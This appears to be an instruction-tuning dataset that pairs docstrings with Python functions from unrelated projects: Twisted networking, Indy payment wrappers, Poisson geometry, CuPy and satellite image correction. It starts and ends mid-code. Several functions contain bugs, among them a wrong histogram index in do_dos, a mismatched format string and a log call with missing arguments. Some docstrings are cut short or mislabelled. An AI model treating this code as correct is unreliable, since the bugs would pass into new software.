self.assertEqual(conn.client_protocol.disconnected_reason, None) + self.assertIsInstance(conn.server_protocol, DummyServerProtocol) + self.assertEqual(conn.server_protocol.side, "server") + self.assertEqual(conn.server_protocol.connected, True) + self.assertEqual(conn.server_protocol.disconnected_reason, None) + self.assertEqual(conn.connected, True) + self.assertEqual(conn.pending, False) + self.successResultOf(conn._accept_d) + self.successResultOf(conn._connected_d) + self.assertNoResult(conn._finished_d) + self.assertEqual(conn.client_protocol, client) +[INST] Start a match operation. Expects the query to be POSTed +as the raw HTTP POST data. + +The query is a list of dictionaries. A dictionary should have the +structure as defined in `vumi.persist.model.Model.index_match` + +The results of the query are stored fo limited time. It defaults +to `MessageStoreCache.DEFAULT_SEARCH_RESULT_TTL` but can be overriden +by specifying the TTL in seconds using the header key as specified +in `REQ_TTL_HEADER`. + +If the request has the `REQ_WAIT_HEADER` value equals `1` (int) +then it will only return with a response when the keys are actually +available for collecting.. [/INST] def render_POST(self, request): + query = json.loads(request.content.read()) + headers = request.requestHeaders + ttl = int(headers.getRawHeaders(self.REQ_TTL_HEADER, [0])[0]) + if headers.hasHeader(self.REQ_WAIT_HEADER): + wait = bool(int(headers.getRawHeaders(self.REQ_WAIT_HEADER)[0])) + else: + wait = False + deferred = self._match_cb(query, ttl=(ttl or None), wait=wait) + deferred.addCallback(self._render_token, request) + return NOT_DONE_YET +[INST] Callback handler that raises an error when called. [/INST] def _cb(*args, **kwargs): + return defer.fail(xmlrpc.Fault(503, 'oh noes!')) +[INST] Callback handler that raises an error when called. [/INST] def _cb(*args, **kwargs): + return defer.fail(ValueError(402, 'Payment Required')) +[INST] Stop attempting to reconnect and close any existing connections.. [/INST] def stopService(self): + self.continueTrying = False + waitFor = [] + if self._delayedRetry is not None and self._delayedRetry.active(): + self._delayedRetry.cancel() + self._delayedRetry = None + if self._connectingDeferred is not None: + waitFor.append(self._connectingDeferred) + self._connectingDeferred.cancel() + self._connectingDeferred = None + if self._protocol is not None: + self._protocolStoppingDeferred = Deferred() + waitFor.append(self._protocolStoppingDeferred) + self._protocol.transport.loseConnection() + d = gatherResults(waitFor) + return d.addCallback(lambda _: Service.stopService(self)) +[INST] Have this connector connect again, after a suitable delay.. [/INST] def retry(self, delay=None): + if not self.continueTrying: + if self.noisy: + log.msg("Abandoning %s on explicit request" % (self.endpoint,)) + return + if self.maxRetries is not None and (self.retries >= self.maxRetries): + if self.noisy: + log.msg("Abandoning %s after %d retries." % + (self.endpoint, self.retries)) + return + self.retries += 1 + if delay is None: + self.delay = min(self.delay * self.factor, self.maxDelay) + if self.jitter: + self.delay = random.normalvariate(self.delay, + self.delay * self.jitter) + delay = self.delay + if self.noisy: + log.msg("Will retry %s in %g seconds" + % (self.endpoint, delay)) + def reconnector(): + proxied_factory = _RestartableProtocolFactoryProxy( + self.factory, self) + self._connectingDeferred = self.endpoint.connect(proxied_factory) + self._connectingDeferred.addCallback(self.clientConnected) + self._connectingDeferred.addErrback(self.clientConnectionFailed) + self._delayedRetry = self.clock.callLater(delay, reconnector) +[INST] Call this method after a successful connection: it resets the delay and +the retry counter.. [/INST] def resetDelay(self): + self.delay = self.initialDelay + self.retries = 0 +[INST] Process a page of keys and each subsequent page. +The keys for the current page are handed off to :meth:`fetch_page` for +processing. If there is another page, we fetch that while the current +page is being handled and add a callback to process it when the +current page is finished. + +When there are no more pages, we add a callback to close the request.. [/INST] def fetch_pages(self, keys_page, concurrency, request): + if request.connection_has_been_closed: + return + d = self.fetch_page(keys_page, concurrency, request) + if keys_page.has_next_page(): + next_page_d = keys_page.next_page() + d.addCallback(lambda _: next_page_d) + d.addCallback(self.fetch_pages, concurrency, request) + else: + d.addCallback(self.finish_request_cb, request) + return d +[INST] Process a page of keys in chunks of concurrently-fetched messages.. [/INST] def fetch_page(self, keys_page, concurrency, request): + for keys in chunks(list(keys_page), concurrency): + if request.connection_has_been_closed: + return + yield self.handle_chunk(keys, request) +[INST] Modifies Indy request by adding information how to pay fees for this transaction +according to selected payment method. + +Payment selection is performed by looking to o + +This method consumes set of UTXO inputs and outputs. The difference between inputs balance +and outputs balance is the fee for this transaction. + +Not that this method also produces correct fee signatures. + +Format of inputs is specific for payment method. Usually it should reference payment transaction +with at least one output that corresponds to payment address that user owns.. [/INST] async def add_request_fees(wallet_handle: int, + submitter_did: str, + req_json: str, + inputs_json: str, + outputs_json: str) -> (str, str): + logger = logging.getLogger(__name__) + logger.debug( + "add_request_fees: >>> wallet_handle: %r, submitter_did: %r, req_json: %r, inputs_json: %r, outputs_json: %r", + wallet_handle, + submitter_did, + req_json, + inputs_json, + outputs_json) + if not hasattr(add_request_fees, "cb"): + logger.debug("add_request_fees: Creating callback") + add_request_fees.cb = create_cb(CFUNCTYPE(None, c_int32, c_int32, c_char_p, c_char_p)) + c_wallet_handle = c_int32(wallet_handle) + c_submitter_did = c_char_p(submitter_did.encode('utf-8')) + c_req_json = c_char_p(req_json.encode('utf-8')) + c_inputs_json = c_char_p(inputs_json.encode('utf-8')) + c_outputs_json = c_char_p(outputs_json.encode('utf-8')) + (req_with_fees_json, payment_method) = await do_call('indy_add_request_fees', + c_wallet_handle, + c_submitter_did, + c_req_json, + c_inputs_json, + c_outputs_json, + add_request_fees.cb) + res = (req_with_fees_json.decode(), payment_method.decode()) + logger.debug("add_request_fees: <<< res: %r", res) + return res +[INST] Parses response for Indy request with fees.. [/INST] async def parse_response_with_fees(payment_method: str, + resp_json: str) -> str: + logger = logging.getLogger(__name__) + logger.debug("parse_response_with_fees: >>> payment_method: %r, resp_json: %r", + payment_method, + resp_json) + if not hasattr(parse_response_with_fees, "cb"): + logger.debug("parse_response_with_fees: Creating callback") + parse_response_with_fees.cb = create_cb(CFUNCTYPE(None, c_int32, c_int32, c_char_p)) + c_payment_method = c_char_p(payment_method.encode('utf-8')) + c_resp_json = c_char_p(resp_json.encode('utf-8')) + utxo_json = await do_call('indy_parse_response_with_fees', + c_payment_method, + c_resp_json, + parse_response_with_fees.cb) + res = utxo_json.decode() + logger.debug("parse_response_with_fees: <<< res: %r", res) + return res +[INST] Builds Indy request for getting UTXO list for payment address +according to this payment method.. [/INST] async def build_get_utxo_request(wallet_handle: int, + submitter_did: str, + payment_address: str) -> (str, str): + logger = logging.getLogger(__name__) + logger.debug("build_get_utxo_request: >>> wallet_handle: %r, submitter_did: %r, payment_address: %r", + wallet_handle, + submitter_did, + payment_address) + if not hasattr(build_get_utxo_request, "cb"): + logger.debug("build_get_utxo_request: Creating callback") + build_get_utxo_request.cb = create_cb(CFUNCTYPE(None, c_int32, c_int32, c_char_p, c_char_p)) + c_wallet_handle = c_int32(wallet_handle) + c_submitter_did = c_char_p(submitter_did.encode('utf-8')) + c_payment_address = c_char_p(payment_address.encode('utf-8')) + (get_utxo_txn_json, payment_method) = await do_call('indy_build_get_utxo_request', + c_wallet_handle, + c_submitter_did, + c_payment_address, + build_get_utxo_request.cb) + res = (get_utxo_txn_json.decode(), payment_method.decode()) + logger.debug("build_get_utxo_request: <<< res: %r", res) + return res +[INST] Parses response for Indy request for getting UTXO list.. [/INST] async def parse_get_utxo_response(payment_method: str, + resp_json: str) -> str: + logger = logging.getLogger(__name__) + logger.debug("parse_get_utxo_response: >>> payment_method: %r, resp_json: %r", + payment_method, + resp_json) + if not hasattr(parse_get_utxo_response, "cb"): + logger.debug("parse_get_utxo_response: Creating callback") + parse_get_utxo_response.cb = create_cb(CFUNCTYPE(None, c_int32, c_int32, c_char_p)) + c_payment_method = c_char_p(payment_method.encode('utf-8')) + c_resp_json = c_char_p(resp_json.encode('utf-8')) + utxo_json = await do_call('indy_parse_get_utxo_response', + c_payment_method, + c_resp_json, + parse_get_utxo_response.cb) + res = utxo_json.decode() + logger.debug("parse_get_utxo_response: <<< res: %r", res) + return res +[INST] Builds Indy request for doing tokens payment according to this payment method. +This method consumes set of UTXO inputs and outputs. + +Format of inputs is specific for payment method. Usually it should reference payment transaction +with at least one output that corresponds to payment address that user owns.. [/INST] async def build_payment_req(wallet_handle: int, + submitter_did: str, + inputs_json: str, + outputs_json: str) -> (str, str): + logger = logging.getLogger(__name__) + logger.debug("build_payment_req: >>> wallet_handle: %r, submitter_did: %r, inputs_json: %r, outputs_json: %r", + wallet_handle, + submitter_did, + inputs_json, + outputs_json) + if not hasattr(build_payment_req, "cb"): + logger.debug("build_payment_req: Creating callback") + build_payment_req.cb = create_cb(CFUNCTYPE(None, c_int32, c_int32, c_char_p, c_char_p)) + c_wallet_handle = c_int32(wallet_handle) + c_submitter_did = c_char_p(submitter_did.encode('utf-8')) + c_inputs_json = c_char_p(inputs_json.encode('utf-8')) + c_outputs_json = c_char_p(outputs_json.encode('utf-8')) + (payment_req_json, payment_method) = await do_call('indy_build_payment_req', + c_wallet_handle, + c_submitter_did, + c_inputs_json, + c_outputs_json, + build_payment_req.cb) + res = (payment_req_json.decode(), payment_method.decode()) + logger.debug("build_payment_req: <<< res: %r", res) + return res +[INST] Parses response for Indy request for getting UTXO list.. [/INST] async def parse_payment_response(payment_method: str, + resp_json: str) -> str: + logger = logging.getLogger(__name__) + logger.debug("parse_payment_response: >>> wallet_handle: %r, payment_method: %r, resp_json: %r", + payment_method, + resp_json) + if not hasattr(parse_payment_response, "cb"): + logger.debug("parse_payment_response: Creating callback") + parse_payment_response.cb = create_cb(CFUNCTYPE(None, c_int32, c_int32, c_char_p)) + c_payment_method = c_char_p(payment_method.encode('utf-8')) + c_resp_json = c_char_p(resp_json.encode('utf-8')) + utxo_json = await do_call('indy_parse_payment_response', + c_payment_method, + c_resp_json, + parse_payment_response.cb) + res = utxo_json.decode() + logger.debug("parse_payment_response: <<< res: %r", res) + return res +[INST] Builds Indy request for doing tokens minting according to this payment method. +This method consumes set of UTXO inputs and outputs. + +Format of inputs is specific for payment method. Usually it should reference payment transaction +with at least one output that corresponds to payment address that user owns.. [/INST] async def build_mint_req(wallet_handle: int, + submitter_did: str, + outputs_json: str) -> (str, str): + logger = logging.getLogger(__name__) + logger.debug("build_mint_req: >>> wallet_handle: %r, submitter_did: %r, outputs_json: %r", + wallet_handle, + submitter_did, + outputs_json) + if not hasattr(build_mint_req, "cb"): + logger.debug("build_mint_req: Creating callback") + build_mint_req.cb = create_cb(CFUNCTYPE(None, c_int32, c_int32, c_char_p, c_char_p)) + c_wallet_handle = c_int32(wallet_handle) + c_submitter_did = c_char_p(submitter_did.encode('utf-8')) + c_outputs_json = c_char_p(outputs_json.encode('utf-8')) + (mint_req_json, payment_method) = await do_call('indy_build_mint_req', + c_wallet_handle, + c_submitter_did, + c_outputs_json, + build_mint_req.cb) + res = (mint_req_json.decode(), payment_method.decode()) + logger.debug("build_mint_req: <<< res: %r", res) + return res +[INST] Builds Indy request for setting fees for transactions in the ledger. [/INST] async def build_set_txn_fees_req(wallet_handle: int, + submitter_did: str, + payment_method: str, + fees_json: str) -> str: + logger = logging.getLogger(__name__) + logger.debug("build_set_txn_fees_req: >>> wallet_handle: %r, submitter_did: %r, payment_method: %r, fees_json: %r", + wallet_handle, + submitter_did, + payment_method, + fees_json) + if not hasattr(build_set_txn_fees_req, "cb"): + logger.debug("build_set_txn_fees_req: Creating callback") + build_set_txn_fees_req.cb = create_cb(CFUNCTYPE(None, c_int32, c_int32, c_char_p)) + c_wallet_handle = c_int32(wallet_handle) + c_submitter_did = c_char_p(submitter_did.encode('utf-8')) + c_payment_method = c_char_p(payment_method.encode('utf-8')) + c_fees_json = c_char_p(fees_json.encode('utf-8')) + set_txn_fees_json = await do_call('indy_build_set_txn_fees_req', + c_wallet_handle, + c_submitter_did, + c_payment_method, + c_fees_json, + build_set_txn_fees_req.cb) + res = set_txn_fees_json.decode() + logger.debug("build_set_txn_fees_req: <<< res: %r", res) + return res +[INST] Builds Indy request for getting fees for transactions in the ledger. [/INST] async def build_get_txn_fees_req(wallet_handle: int, + submitter_did: str, + payment_method: str) -> str: + logger = logging.getLogger(__name__) + logger.debug("build_get_txn_fees_req: >>> wallet_handle: %r, submitter_did: %r, payment_method: %r", + wallet_handle, + submitter_did, + payment_method) + if not hasattr(build_get_txn_fees_req, "cb"): + logger.debug("build_get_txn_fees_req: Creating callback") + build_get_txn_fees_req.cb = create_cb(CFUNCTYPE(None, c_int32, c_int32, c_char_p)) + c_wallet_handle = c_int32(wallet_handle) + c_submitter_did = c_char_p(submitter_did.encode('utf-8')) + c_payment_method = c_char_p(payment_method.encode('utf-8')) + get_txn_fees_json = await do_call('indy_build_get_txn_fees_req', + c_wallet_handle, + c_submitter_did, + c_payment_method, + build_get_txn_fees_req.cb) + res = get_txn_fees_json.decode() + logger.debug("build_get_txn_fees_req: <<< res: %r", res) + return res +[INST] Read a csv reader iterator until a blank line is found.. [/INST] def csv_record_reader(csv_reader): + prev_row_blank = True + for row in csv_reader: + if not (len(row) == 0): + if row[0].startswith('#'): + continue + yield [cell.strip() for cell in row] + prev_row_blank = False + elif not prev_row_blank: + return +[INST] Read a reader iterator and return a list of dictionaries, each including column name and value.. [/INST] def dataframe(reader, columns): + df = [] + for row in reader: + df.append(dict(zip(columns, row))) + return df +[INST] Returns a standard warning that can be placed at the top of each +generated _Fortran_ include file.. [/INST] def header(): + return """ +! ------------------- +! W A R N I N G +! ------------------- +! +! This code fragment is automatically generated by MAPL_GridCompSpecs_ACG. +! Please DO NOT edit it. Any modification made in here will be overwritten +! next time this file is auto-generated. Instead, enter your additions +! or deletions in the .rc file in the src tree. +! + """ +[INST] This method check if the dimension variable is valid for the this class. [/INST] def validate_dimension(dim): + if not isinstance(dim, int): + raise DimensionError(F"{dim} is not int") + if dim < 2: + raise DimensionError(F"{dim} < 2") + else: + return dim +[INST] Constructs the matrix of a 2-contravariant tensor field or bivector field. +Parameters. [/INST] def bivector_to_matrix(self, bivector, latex=False): + bivector_matrix = sym.zeros(self.dim + 1) + for e in bivector: + if len(set(e)) < len(e): + raise MultivectorError(F"repeated indexes {e} in {bivector}") + if len(tuple(filter(lambda x: (x <= 0), e))) > 0: + raise MultivectorError(F"invalid key {e} in {bivector}") + bivector_matrix[e] = bivector[e] + swap_e = e[::-1] + bivector_matrix[swap_e] = (-1) * bivector_matrix[e] + return sym.latex(bivector_matrix) if latex else bivector_matrix[1:, 1:] +[INST] Check if a differential 1-form alpha belongs to the kernel of a given Poisson bivector field, +that is check if P#(alpha) = 0 + +Parameters. [/INST] def is_in_kernel(self, bivector, one_form): + image = self.sharp_morphism(bivector, one_form) + if not isinstance(image, dict): + return image + return False if bool(image) else True +[INST] Check if a homogeneous Poisson bivector field is unimodular +or not. + +Parameters. [/INST] def is_unimodular_homogeneous(self, bivector): + for key in bivector: + if sym.homogeneous_order(bivector[key], *self.coords) is None: + msg = f'{key}: {bivector[key]} is not a polynomial homogeneous with respect to {self.coordinates}' + raise Nonhomogeneous(msg) + if sym.homogeneous_order(bivector[key], *self.coords) < 0: + msg = f'{key}: {bivector[key]} is not a polynomial homogeneous with respect to {self.coordinates}' + raise Nonhomogeneous(msg) + mod_vf = self.modular_vf(bivector, '1') + if not isinstance(mod_vf, dict): + return mod_vf + return False if bool(mod_vf) else True +[INST] This method compute the Gauge transformation of a Poisson bivector field. +Parameters. [/INST] def gauge_transformation(self, bivector, two_form, gauge_biv=True, det=False, latex=False): + if not gauge_biv and not det: + return {} + bivector_matrix = self.bivector_to_matrix(bivector) + two_form_matrix = self.bivector_to_matrix(two_form) + if not isinstance(bivector_matrix, sym.matrices.dense.MutableDenseMatrix): + return bivector_matrix + if not isinstance(two_form_matrix, sym.matrices.dense.MutableDenseMatrix): + return two_form_matrix + I_plus_deltas = [sym.eye(self.dim) + two_form_matrix.col(0) * ((-1) * bivector_matrix.row(0))] + for k in range(1, self.dim - 1): + I_plus_deltas.append(I_plus_deltas[k - 1] + two_form_matrix.col(k) * ((-1) * bivector_matrix.row(k))) + adj_I_deltas = [sym.Matrix.adjugate(e) for e in I_plus_deltas] + viT_adj_I_deltas_ui = [(((-1) * bivector_matrix.row(i)) * adj_I_deltas[i-1] * two_form_matrix.col(i))[0] for i in range(1, self.dim)] + sum_viT_adj_I_deltas_ui = sum(viT_adj_I_deltas_ui) + gauge_det = 1 + (((-1) * bivector_matrix.row(0)) * two_form_matrix.col(0))[0] + sum_viT_adj_I_deltas_ui + if det and not gauge_biv: + if latex: + return sym.latex(gauge_det) + return f"{gauge_det}" + gauge_det = sym.simplify(gauge_det) + if gauge_det == 0: + return False + BP = two_form_matrix * bivector_matrix + I_minus_BP = sym.eye(self.dim) - BP + adj_I_BP = sym.Matrix.adjugate(I_minus_BP) + inv_I_BP = (1 / gauge_det) * adj_I_BP + gauge_matrix = bivector_matrix * inv_I_BP + gauge_matrix = sym.matrices.SparseMatrix(gauge_matrix) + gauge_matrix_RL = gauge_matrix.RL + sym_gauge_bivector = {(e[0] + 1, e[1] + 1): e[2] for e in gauge_matrix_RL if e[0] < e[1]} + str_gauge_bivector = {(e[0] + 1, e[1] + 1): f"{e[2]}" for e in gauge_matrix_RL if e[0] < e[1]} + if det: + if latex: + return sym.latex(sym_gauge_bivector), sym.latex(gauge_det) + return str_gauge_bivector, f"{gauge_det}" + if latex: + return sym.latex(sym_gauge_bivector) + return str_gauge_bivector +[INST] Calculates a normal form for Lie-Poisson bivector fields on R^3 modulo linear isomorphisms. +Parameters. [/INST] def linear_normal_form_R3(self, bivector, latex=False): + for key in bivector: + if sym.homogeneous_order(bivector[key], *self.coords) is None: + msg = f'{key}: {bivector[key]} is not a linear polynomial with respect to {self.coordinates}' + raise Nonlinear(msg) + if sym.homogeneous_order(bivector[key], *self.coords) != 1: + msg = f'{key}: {bivector[key]} is not a linear polynomial with respect to {self.coordinates}' + raise Nonlinear(msg) + if not bool(bivector): + return {} + for e in bivector: + if len(e) != 2 or len(tuple(filter(lambda x: (x <= 0), e))) > 0: + raise MultivectorError(F'invalid key {e} in {bivector}') + if len(set(e)) < len(e): + raise MultivectorError(F'repeated indexes {e} in {bivector}') + if [bivector[e].find(f'{self.variable}') for e in bivector].count(-1) != 0: + return {} + bivector = sym.sympify(bivector) + pair_E_P = [] + for e in bivector: + if sym.simplify(e[0] * e[1] - 6) == 0: + pair_E_P.append(-self.coords[0] * bivector[e]) + if sym.simplify(e[0] * e[1] - 3) == 0: + pair_E_P.append(self.coords[1] * bivector[e]) + if sym.simplify(e[0] * e[1] - 2) == 0: + pair_E_P.append(-self.coords[2] * bivector[e]) + pair_E_P = sym.sympify('1/2') * sum(pair_E_P) + hessian_pair_E_P = sym.sympify('1/2') * sym.hessian(pair_E_P, self.coords[:3]) + rank_hess = hessian_pair_E_P.rank() + egvals_hess = [sym.re(e) for e in hessian_pair_E_P.eigenvals(rational=True, multiple=True)] + sign_hess = sum([sym.sign(e) for e in egvals_hess]) + if self.is_unimodular_homogeneous(bivector): + if sym.simplify(rank_hess - 3) == 0: + if sym.simplify(sym.Abs(sign_hess) - 3) == 0: + if latex: + return sym.latex({ + (1, 2): F'{self.coords[2]}', + (1, 3): F'-{self.coords[1]}', + (2, 3): F'{self.coords[0]}' + }) + return { + (1, 2): F'{self.coords[2]}', + (1, 3): F'-{self.coords[1]}', + (2, 3): F'{self.coords[0]}', + } + if sym.simplify(sym.Abs(sign_hess) - 1) == 0: + if latex: + return sym.latex({ + (1, 2): F'-{self.coords[2]}', + (1, 3): F'-{self.coords[1]}', + (2, 3): F'{self.coords[0]}', + }) + return { + (1, 2): F'-{self.coords[2]}', + (1, 3): F'-{self.coords[1]}', + (2, 3): F'{self.coords[0]}', + } + if sym.simplify(rank_hess - 2) == 0: + if sym.simplify(sym.Abs(sign_hess) - 2) == 0: + if latex: + return sym.latex({(1, 3): F'-{self.coords[1]}', (2, 3): F'{self.coords[0]}'}) + return {(1, 3): F'-{self.coords[1]}', (2, 3): F'{self.coords[0]}'} + if sign_hess == 0: + if latex: + return sym.latex({(1, 3): F'{self.coords[1]}', (2, 3): F'{self.coords[0]}'}) + return {(1, 3): F'{self.coords[1]}', (2, 3): F'{self.coords[0]}'} + if sym.simplify(rank_hess - 1) == 0: + if latex: + return sym.latex({(2, 3): F'{self.coords[0]}'}) + return {(2, 3): F'{self.coords[0]}'} + if rank_hess == 0: + if latex: + return sym.latex({(1, 3): F'{self.coords[0]}', (2, 3): F'{self.coords[1]}'}) + return {(1, 3): F'{self.coords[0]}', (2, 3): F'{self.coords[1]}'} + if sym.simplify(rank_hess - 2) == 0: + if sym.simplify(sym.Abs(sign_hess) - 2) == 0: + if latex: + return sym.latex({ + (1, 3): F'{self.coords[0]} - 4*a*{self.coords[1]}', + (2, 3): F'4*a*{self.coords[0]} + {self.coords[1]}', + }) + return { + (1, 3): F'{self.coords[0]} - 4*a*{self.coords[1]}', + (2, 3): F'4*a*{self.coords[0]} + {self.coords[1]}', + } + if sign_hess == 0: + if latex: + return sym.latex({ + (1, 3): F'{self.coords[0]} + 4*a*{self.coords[1]}', + (2, 3): F'4*a*{self.coords[0]} + {self.coords[1]}' + }) + return { + (1, 3): F'{self.coords[0]} + 4*a*{self.coords[1]}', + (2, 3): F'4*a*{self.coords[0]} + {self.coords[1]}' + } + if sym.simplify(rank_hess - 1) == 0: + if latex: + return sym.latex({(1, 3): f'{self.coords[0]}', (2, 3): f'4*{self.coords[0]} + {self.coords[1]}'}) + return {(1, 3): f'{self.coords[0]}', (2, 3): f'4*{self.coords[0]} + {self.coords[1]}'} + return {} +[INST] Determines if two Lie-Poisson bivector fields on R^3 are isomorphic or not. +Parameters. [/INST] def isomorphic_lie_poisson_R3(self, bivector_1, bivector_2): + normal_1 = self.linear_normal_form_R3(bivector_1) + normal_2 = self.linear_normal_form_R3(bivector_2) + if not bool(normal_1) and not bool(normal_2): + return True + if not isinstance(normal_1, dict): + return normal_1 + if not isinstance(normal_2, dict): + return normal_2 + if len(normal_1) - len(normal_2) != 0: + return False + if len(normal_1) - 1 == 0 and len(normal_2) - 1 == 0: + return True + normal_1 = sym.sympify(normal_1) + normal_2 = sym.sympify(normal_2) + if len(normal_1) - 2 == 0 and len(normal_2) - 2 == 0: + compare = [1 for e in normal_1 if sym.simplify(normal_1[e] - normal_2[e]) != 0] + return True if len(compare) == 0 else False + if len(normal_1) - 3 == 0 and len(normal_2) - 3 == 0: + return True if sym.simplify(normal_1[(1, 2)] - normal_2[(1, 2)]) == 0 else False + return False +[INST] Calculates de Schouten-Nijenhuis bracket of a given bivector field with himself, that is [P,P] +where [,] denote the Schouten bracket for multivector fields. + +Parameters. [/INST] def jacobiator(self, bivector, latex=False): + jac = self.coboundary_operator(bivector, bivector, latex=latex) + if not isinstance(jac, dict): + return jac + return jac +[INST] Calculates de Schouten-Nijenhuis bracket of a given bivector field with himself, +that is calculates [P,P]_SN. + +Parameters. [/INST] def is_poisson_bivector(self, bivector): + jac = self.coboundary_operator(bivector, bivector) + if not isinstance(jac, dict): + return jac + return False if bool(jac) else True +[INST] Check if a vector field is a Poisson vector field of a given Poisson bivector field, that is calculate if +[Z,P] = 0, where Z is vector_field variable and P is bivector variable. + +Parameters. [/INST] def is_poisson_vf(self, bivector, vector_field): + sch_biv_vf = self.coboundary_operator(bivector, vector_field) + if not isinstance(sch_biv_vf, dict): + return sch_biv_vf + return False if bool(sch_biv_vf) else True +[INST] Check if the sum of two Poisson bivector fields P1 and P2 is a Poisson bivector field, that is +calculate if [P1,P2] = 0 + +Parameters. [/INST] def is_poisson_pair(self, bivector_1, bivector_2): + sch_biv1_biv2 = self.coboundary_operator(bivector_1, bivector_2) + if not isinstance(sch_biv1_biv2, dict): + return sch_biv1_biv2 + return False if bool(sch_biv1_biv2) else True +[INST] scan event, It will be triggered when you scan the qrcode to login. +And it will not be triggered when you have logined. [/INST] async def on_scan(self, status: ScanStatus, qr_code: Optional[str] = None, + data: Optional[str] = None): + contact = self.Contact.load(self.contact_id) + await contact.ready() + print(f'user <{contact}> scan status: {status.name} , ' + f'qr_code: {qr_code}') +[INST] Calculate the n-th discrete difference along the given axis.. [/INST] def diff(a, n=1, axis=-1): + a = cupy.asanyarray(a) + nd = a.ndim + axis = normalize_axis_index(axis, nd) + slice1 = [slice(None)] * nd + slice2 = [slice(None)] * nd + slice1[axis] = slice(1, None) + slice2[axis] = slice(None, -1) + slice1 = tuple(slice1) + slice2 = tuple(slice2) + op = cupy.not_equal if a.dtype == cupy.bool_ else cupy.subtract + for _ in range(n): + a = op(a[slice1], a[slice2]) + return a +[INST] Perform total-variation denoising on n-dimensional images. +Parameters + +image : ndarray of ints, uints or floats +Input data to be denoised. `image` can be of any numeric type, +but it is cast into an ndarray of floats for the computation +of the denoised image. +weight : float, optional +Denoising weight. The greater `weight`, the more denoising (at +the expense of fidelity to `input`). +eps : float, optional +Relative difference of the value of the cost function that +determines the stop criterion. The algorithm stops when. + + + +n_iter_max : int, optional +Maximal number of iterations used for the optimization. +multichannel : bool, optional +Apply total-variation denoising separately for each channel. This +option should be true for color images, otherwise the denoising is +also applied in the channels dimension. + +Returns + +out : ndarray +Denoised image. + +Notes + +Make sure to set the multichannel parameter appropriately for color images. + + + +The principle of total variation denoising is to minimize the +total variation of the image, which can be roughly described as +the integral of the norm of the image gradient. Total variation +denoising tends to produce "cartoon-like" images, that is, +piecewise-constant images. + +This code is an implementation of the algorithm of Rudin, Fatemi and Osher +that was proposed by Chambolle in [1]_. + +References + +[1] A. Chambolle, An algorithm for total variation minimization and +applications, Journal of Mathematical Imaging and Vision, +Springer, 2004, 20, 89-97. + +Examples + +2D example on astronaut image. + + + +3D example on synthetic data.. [/INST] def denoise_tv_chambolle(image, weight=0.1, eps=2.e-4, n_iter_max=200, + multichannel=False): + xp = get_array_module(image) + im_type = image.dtype + if not im_type.kind == 'f': + raise NotImplementedError( + "please convert input to floating point type") + if multichannel: + out = xp.zeros_like(image) + for c in range(image.shape[-1]): + out[..., c] = _denoise_tv_chambolle_nd(image[..., c], weight, eps, + n_iter_max, xp=xp) + else: + out = _denoise_tv_chambolle_nd(image, weight, eps, n_iter_max, xp=xp) + return out +[INST] Estimate toa reflectance from radiometric data +ignoring atmospheric, topographic and BRDF effects + +Parameters + +radata : ndarray shape (nbands, ny, nx) +radiance data +mtdFile : str +path to IMD metadata file +band_ids : sequence of int +band IDs + +Returns + +ndarray +reflectance. [/INST] def toa_reflectance(radata, mtdFile, band_ids): + return reflectance.radiance_to_reflectance(radata, mtdFile, band_ids=band_ids) +[INST] Calculate TOA reflectance +Parameters + +infiles : list of str or str +paths to Landsat 8 band files +or URIs for members in TAR file +or path to TAR file +outfile : str +path to save output to +mtdfile : str +path to metadata file +bands : list of int +bands to extract from TAR file +or bands that the URIs correspond to. [/INST] def toa_reflectance(infiles, outfile, mtdfile, bands): + bandfiles = l8utils.get_bandfiles(infiles, bands) + reflectance.calculate_landsat_reflectance( + src_path=bandfiles, + src_mtl=mtdfile, + dst_path=outfile, + rescale_factor=None, + creation_options={}, + bands=bands, + dst_dtype='float32', + processes=1, + pixel_sunangle=True) +[INST] DOS correction using histogram with 2048 bins since WV2 has 11 bit radiometric resolution. [/INST] def do_dos(data): + nonzero = data != 0 + n = np.sum(nonzero) + tiny_fraction = n - n * 0.999999 + nbands = data.shape[0] + dosDN = np.zeros(nbands) + for i in range(nbands): + hist, edges = np.histogram( + data[i], bins=2048, range=(1, 2048), density=False) + for k in range(1, len(hist)): + if hist[k] - hist[i - 1] > tiny_fraction: + dosDN[i] = k - 1 + break + return dosDN +[INST] Adjacency correction +Parameters + + + +Sources + +Following Ouaidrari & Vermote 1999: Operational Atmospheric Correction of Landsat TM Data. [/INST] def adjacency_correction(refl, view_z, tau, T_dir, T_dif, pixel_size, radius=1.0): + rolled = False + if np.ndim(view_z) == 1: + rolled = True + refl = np.rollaxis(refl, 0, 3) + u_v = np.cos(np.radians(view_z)) + T = 1 - ((1 - T_dif) + (1 - T_dir)) + mask = np.isnan(refl) + refl[mask] = np.interp(np.flatnonzero(mask), np.flatnonzero(~mask), refl[~mask]) + sigma = radius / pixel_size + adjRefl = scipy.ndimage.filters.gaussian_filter(refl, sigma) + t_d = T_dif - np.exp(-tau / u_v) + refl = (refl * T - adjRefl * t_d) / np.exp(-tau / u_v) + refl[refl < 0.0] = 0.0 + refl[mask] = np.nan + if rolled: + return np.rollaxis(refl, 2, 0) + else: + return refl +[INST] Apply radiometric correction to Pleadis image. [/INST] def dn_to_radiance(dndata, mtdFile, band_ids): + metadata = plparser.parse_metadata(mtdFile) + gain_bias = metadata['calibration_values'] + gain, bias = (np.array(gain_bias[key])[band_ids] for key in ['gain', 'bias']) + radata = np.zeros(dndata.shape, dtype='float32') + with np.errstate(invalid='ignore'): + for i in range(radata.shape[0]): + radata[i, ...] = dndata[i] / gain[i] + bias[i] + radata[radata < 0] = 0 + return radata +[INST] Get target of sensors that have similar sets of bands. [/INST] def sensor_group_bands(sensor): + for target in ['WV', 'PHR', 'L7', 'L8', 'S2', 'WV_4band']: + if sensor_is(sensor, target): + return target + raise ValueError('Unable to get sensor group for \'%s\'.'.format(sensor)) +[INST] Sets up Py6S instance and returns job for run_sixs_for_wavelength +Parameters + +rcurves_dict : dict +sensor response curve parameters +sixs_params : dict +keyword arguments for setup_sixs + +Returns + +list of tuples (SixS, float, float, ndarray) +SixS instance +start and env wavelengths +sensor response curve. [/INST] def generate_jobs(rcurves_dict, sixs_params): + mysixs = setup_sixs(**sixs_params) + jobs = [] + for rcurve in rcurves_dict['rcurves']: + s = copy.deepcopy(mysixs) + s.wavelength = Py6S.Wavelength(rcurves_dict['start_wv'], rcurves_dict['end_wv'], rcurve) + jobs.append((s, )) + return jobs +[INST] Run sixs for a specific wavelength +Parameters + +args : tuple +initialized SixS instance +[additional args passed through] + +Returns + +dict +correction parameters +list of float +adjacency correction parameters +list +arguments passed through. [/INST] def run_sixs_job(args): + mysixs = args[0] + moreargs = 